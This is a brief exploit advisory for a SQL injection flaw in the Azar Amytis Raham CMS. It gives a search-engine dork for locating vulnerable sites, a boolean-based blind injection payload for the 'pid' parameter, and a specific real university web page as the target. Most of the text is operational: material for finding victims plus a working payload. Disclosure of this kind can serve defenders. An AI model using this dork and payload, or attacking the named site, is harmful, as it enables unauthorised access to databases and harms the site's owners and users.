[+] Exploit Title ; Azar Amytis Raham cms sql injection vulnerability
[+] Date : 2017-10-21
[+] Author : 0p3n3r From IRANIAN ETHICAL HACKERS
[+] Vendor Homepage : http://www.azarnetit.com/
[+] Dork : intext:"Powerd By: Azar Amytis Raham Group ©" inurl:php?id=
[+] Tested On : windows 10 - kali linux 2.0
[+] Contact : https://telegram.me/WebServer
[+] Poc :
[!] http://localhaost/path/page.php?id=categoryview&pid=sqli
Parameter: pid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: pid=11' AND 9455=9455 AND 'zOpF'='zOpF
[+] Target :
[!] http://or2012.azaruniv.ac.ir/farsi/page.php?pid=11